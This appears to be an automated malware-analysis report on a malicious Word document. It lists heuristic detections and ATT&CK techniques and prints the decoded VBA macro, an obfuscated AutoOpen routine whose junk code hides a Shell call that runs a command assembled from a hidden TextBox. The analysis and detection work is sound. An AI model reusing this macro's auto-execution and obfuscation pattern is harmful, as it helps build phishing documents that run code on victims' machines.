MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary code. This is further supported by the 'SC_STR_CMD' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The primary IOC is the VBA macro file itself, which contains the malicious logic.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6782702-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6782702-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(oALJI, LvAUILAiisB), iHkRrQv) Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() ZifucmS -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8626 bytes |
SHA-256: 3dbfdb64e298b3e84380fb49d26fbf49725581d562f7d89e1c02743846b9f020 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
232 of 276 identifiers look randomly generated (e.g. 'LTrkraKGLYPXuzSuMlMJSPdc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hnzhWjZcdibvb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ZifucmS
End Sub
Attribute VB_Name = "GzXjaIqrqfcWn"
Function ZifucmS()
On Error Resume Next
Set CNkmDESYvqlZoWncihEAuzD = GrrYTfFNjnUsSrVF
Select Case EAdrqoJtOaFfazEJZjLNtEQl
Case 156759412
ABuJqMwEqzZTPDiiFEAiGoQ = tLJsCAksTznHwEksjVIGk
QIfPwLlpmMkLQiC = 45492296
qNhzSPafBTHBkf = wmvBMnBYGdKbXnnG
Case 280778363
TStCGwsFjzrdnCjbMdj = CByte(uOpoaVHoDsNNQc)
NQwjwJGDDhdpIuwaK = ChrW(qiEcEbkrECqkdNLlSK)
zmqnLlHzfwtHSCqaz = Log(kLUvFEEMTDQiXclJ)
End Select
Set aHaVolkErPrSzczbWHShPQad = SCASMXYMVMVWuIaGFvZl
Select Case WwjYiBoEiJjzoWijlisTFdP
Case 185194396
bzrbJVBrmwDQuiV = InCoYFlsXUQhSosjHTGBw
YofFCafSrAWizqNnjVNz = 26634163
FUZzDUIbXUniOOJSDLMEcQ = jrCWUmlnzZijLjFW
Case 68739565
PdCuSbwdOSCmzMoJ = CByte(GAwopmjqFjiwmzpCuNnIpY)
XqXSlKZVuBqzVLVaqWD = ChrW(vTfcUMkEzBBAhZbw)
TujfKkzwwTqZnwllK = Log(DKvwYaVVszpRwkXIXbXi)
End Select
Set ifbJwlGuVvBOicCXEYCTDE = cNCVFsjRkQwaiTDl
Select Case ziTQrivoEUEMzMi
Case 165985188
wwvQABoiQwlCTEBntT = luliGjBYcEnDNBOUGp
zhimakKmkPDZDsNnZMSojzd = 84078745
duYBEkuzBUoGILtwuQI = fjKANpHoAJzDRNwqmkj
Case 206141901
bCYYhRBZsojUotu = CByte(XoPcFwrVkovOCKJkdPEhm)
fYGPIUQjdTCHOwRDDiK = ChrW(osWmWhiwqYpNwv)
qVqoXEALbMuvNTa = Log(aWinnCTsapRsEipL)
End Select
Set ujYYTWqHCAQsLjmwajhUPIq = iSBNantBEtWIdXXLjZdCSt
Select Case BiEzuLkdltipBUdh
Case 101335840
OnRKdSDMVkqfnWp = AiWpzpUPkOuhWrF
OvDFvqAluiqznGGMAwTuLZI = 166465422
CZPXWpifzQsSjJJikv = zVciIijaXLjonimtQ
Case 246868981
YsLUopNtRmKMairZ = CByte(avGppPHTScFnzPtwWWYnAnou)
PnNwFJvEoSVfYidEAVNIGT = ChrW(RPDHTmzmGLAacuVMSJ)
JzXRwoviASbmivQvjCBcS = Log(jOTYHBKiIuwWKatwFTYDwTf)
End Select
Set HvZswDQuZQrjLGHo = FKTsaJjnEkiVjuiCNzWUW
Select Case nwwjXukRJqGCIAkUjltEsSm
Case 166865944
WNdwGkTNKWXurmmDmbnOhl = SsTkbRCVJZsBjHTCFnpz
NaozHBFrzKJkkLFnAsvI = 10278459
VwkFwTYibrnzESik = QwiKOjQwvOPEutpczF
Case 276101072
BFmSQjRzkGmIPYfLX = CByte(GOTIAEJdhwwWFN)
VSKKLufSTMpbGpVOdFwwav = ChrW(FhJmBSwOBZTuGUBLJbwAvKc)
oLjVRIONZYFcBH = Log(zVwoCnuPubtnXivzuEHw)
End Select
Const LvAUILAiisB = 0
Set zKSmfOcGLfbzCtIqnXMiHdIP = JhYIBjOhYlRHGNlHdYUi
Select Case qWjhwEfkrUCCFWjD
Case 325639317
wNPiHrjjKbWiEolW = KraCciwhRPFBrEDfN
RuMPpwStDOMPOQjDVM = 148605403
ViTwqbdfSXSwqSU = GvCcjifiUCBoRnirJFA
Case 256145005
PZNUmajvOYvwHwaKuYm = CByte(kbnapNfobplRhAqWoHzIwnGd)
rJqIhOhNnqnlnfY = ChrW(sUYniOHFDVmbiAzVJUzDofta)
EtJCkAcYMGThqb = Log(CkELcFintSbThVHMaziZ)
End Select
Set MTDltwkEPjSJoPzNzlD = sMzVorjvFMzFAHhj
Select Case IzlXzsUPcCCCDu
Case 204367535
zhzViwBSowDjNIjhQLq = SnuUcGMoisBRUdCaiNTMz
iwpkBTVVmrDtIKmfs = 182570091
NnwzlPjGGzCsiozEwfsFs = JGKOaVrnCVrbkfmBDU
Case 116879616
PWkzZFJGpzAWruiq = CByte(XpOOSwhBCEURvbXnfDmVKp)
MkzCUUkqAwNjfDwwZC = ChrW(WAoptYdjMqrUchTCdVtMjSOU)
hurkjGNSMSUXvDirlX = Log(IclwMAVbjpREmTVMdlzjkiBP)
End Select
Set FJwvbTzWVJjDCiwvdkD = OEYZNqVpCwkhPv
Select Case HiNwuRljqBNXdUSvkMEJBlX
Case 229404180
wJUYZznGnpQPlJncUhXzT = UjAzUKmtVGiOwHQKQCZQpiB
wDRhjDAjQGolYZicUtUJ = 246920932
MfLKRUZDBqiUARtENR = vzqSflrXwwwJrub
Case 280116441
VVmfJNEwCEYNjPjCCqZWN = CByte(YZzcGFjqZZaHjribmklT)
hSJNjPHoECTXpwMhjGwS = ChrW(izmbjpYbEokuCrHn)
ZqZBVXGjtuSuFinBQ = Log(TWlAZjNANidmFF)
End Select
Set APQdmGrCWoSImjFtjJMSj = wzZkLlNHTGmUFZwWCrnG
Select Case EZiHhZkArrSBUSTDCvFpO
Case 137679033
VRafwJHUidvsYqdi = dHbPTTlGcSzwiRVj
NpGtnqkWoYYavNZQ = 300810631
HtwBwoYUqIYwMZJK = nXSpQrsfvMjhFafoFOqR
Case 78027906
SUSzczsLwRljmtbWqCDWDcs = CByte(lhtHHLTsRvFzXQOvmjNOvW)
mNiXnOpopcfOuElEnwsSqn = ChrW(wanHkTOirOuGuYoficGP)
rCUqBiaQDDzwikzAGF = Log(awnzAzqjzTOqjXIHYS)
End Select
oALJI = hnzhWjZcdibvb.TextBox1 + oNoLzILo + XWmpXDC + KzazoNNa + ZipWflk + DpfsIoqT + lDVwYYs + zzjhlL + iAHDmENR + ERIwuPs
Set ZMpavCwFzbLwnzTwvdj = QVzjuljZHPWsKbucHLSJVw
Select Case EHFiwbobwjAKDNJfJT
Case 148519610
jESoMErpjLWUUBuYpDlwToZJ = RrOwjJqwwlAoRWtk
slMfqCSkqGhYivfJiuNcqDBj = 144900882
QujYjrNUwoziaowNpC = aUpUfmbfHIojjJU
Case 250902814
ARZqKKzrMAUYjdNzXvB = CByte(ZElFLGMHEQUGCYMYcSQ)
pdTlHGbiakIOTLww = ChrW(UiEwrmvjNWIQpWFfrlwk)
zFihjTIGmraPrH = Log(LLzqYFtkTNlOCicaCMfXZZ)
End Select
Set lPzmwAlTFNzPNjCRNKzldChk = haPlNaGIFUIMia
Select Case aRJYzXKFcAsbPB
Case 145641136
iNmPZVhrnqHHLuFjjtKMt = ndWUnlVwrGjmazr
dFjSkGPCtiuJsVrJ = 270719507
ZItFivVpzBYZTGrXPFc = XjNUbErLGVPZzAZiRYW
Case 264765063
vHOiUOoSUFljOCtvZddEKidl = CByte(bTjIFriodbYwpHqCtmPdtiwf)
sutjmNicfsuHJOOCslaVwj = ChrW(nBQwNIFtUBUNwpEqOu)
KOvvjYBaBzYKqJYFiW = Log(QUazaFpBSNnvLaaYI)
End Select
Set RbNwZosVPmBdUqujHNSI = tiEaONLraiYojwawnq
Select Case XtMCsZSjJuHzjmIYwJWKbjdp
Case 26338836
pktTkUWVkbjcMAwhCzT = sCbYdpRjVqPXwPkhmpJna
BjrTzVNtifVSjnJV = 275213884
CqAuMIiwQPvNnjKiBujKsvS = LjCfjzYQzOkkKGUjpAF
Case 330253977
QrpHAlOpfCGXYicFzPTriNZv = CByte(YvawVrqUcvrMXfLJbUL)
MlXrdqklGUDSthcqnsKL = ChrW(DwnksbkHhDtNROnXj)
fGENIrZTqDVWiJANJ = Log(jHlOAiYRJEcTpSEafELpnv)
End Select
Set wsiwMimZqhwPNlllMVk = zsZSDjtOmGMoLimzrmlR
Select Case tvVwcOZqwhUMKaESPs
Case 207562806
XmkUHEjwmtajTFGwETbRT = qYsbBDhjctGjzGLBrX
aEDHktFUHOwRNRAwLcfC = 208117274
GQjdnFzlCcDmtTnRH = vjaRjcsOzKzYLVzJzmaHG
Case 339103066
VMTNaYhJuVzHwqpkEl = CByte(GpmiQimjVBqAbwPEEMP)
qSAFDONDSIBWWisij = ChrW(DiooLIDVVKhlkYpTiooja)
UjQMzTitDkVWIk = Log(BGsBisDWjYchCzEqCHAJ)
End Select
Set lEXLrzHbkhqlCwCNKHRlXjdt = wEkkwjUAaXOzkzvLiQ
Select Case dDGIEvpttIaBbdousWqoA
Case 141322866
baoNZIVZtSvPSpwjoGnbs = VmWwEDonchISfi
iQkYihjjNVFwqChMu = 297796595
EBrdDSlFqNHAKNPGqCC = TmGIazGwluUNZDdP
Case 284999962
hGzbsSGVuiavrKrjISuiCD = CByte(nTvstaGkAPCVwMrt)
CFEXXqDKWpvLUIkduJIzaM = ChrW(owZjoouXRYHjwznPdshXlKY)
GSsCCiwNpLQYzJOWbSim = Log(coiGtiFspIdZtaWw)
End Select
Set LTrkraKGLYPXuzSuMlMJSPdc = hjuHQfUZipMtJEtswOwtlQS
Select Case kobDwiwpPsJrPwutvwQH
Case 39894504
CjTRVBjiGRQQWc = QaztWiRvBdwTDz
zLXjlukhIuJjlsbwbSpiYQ = 95763781
WklRnXhdkTRFtnqJfsrwN = jCaiWBNSOjwoMAJSulNfvRbW
Case 33113987
cjwjZQVZEirIAjPRFhIEap = CByte(NwGkhCPbEZiZhT)
KjSnwablkhPdMtNAOmflh = ChrW(fnWoGniSHizWXcmmsZ)
MVDRYDiqZTmBiArAiRITnC = Log(ahfpVkOctFzVzbVzl)
End Select
Set AvNqiOSjtLFSBlwAjWnmi = vJcTJXXpPPwSTGaEcPA
Select Case UkTZWcudvWbMBZA
Case 26007817
PFvLDvqVjSpabtXl = HKqDwjcuutnjQtGWrMK
wQpcDmKEDUcDabR = 277639962
KSYSRJCClTYjDkhN = iqUNAKWYqZQkJobQIjtl
Case 253529522
GmaRSlUzkvquwbVAJICu = CByte(jlSciwTvDnctAjinjrk)
qpVuOsAuIXljsC = ChrW(BHonoBEjHNAwrnNaQR)
kuPYOmvYnjCsBzMjfuDvCmJ = Log(jOvJHuwURARcmjaB)
End Select
zIjrcHw = Array(NQEqji, frKRMkoXm, tzuSPHb, Interaction _
_
_
_
_
_
_
_
.Shell(oALJI, LvAUILAiisB), iHkRrQv)
Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ
Select Case RHKWJiQljUNbXP
Case 172951747
dZIUOMMFIFPYQrjmoRPS = dwwmSPWfJnPkMunawnEv
NDSsUrkanGAIEAb = 78603416
wwpZzRAnDzwMsdKXXPudu = YmFVhOcIuMOOqHFfNmREQuoO
Case 308983579
qkjkjinzYDUdkmKvDkwi = CByte(CRrCIMpjiwqbFYrbKfjarj)
LkBftVrDPQpoTp = ChrW(XWzTuFdCfOTTsFSDvSPjS)
jwLnubKPjYmcHKc = Log(pzihWRaBwwzNtVEIPRp)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.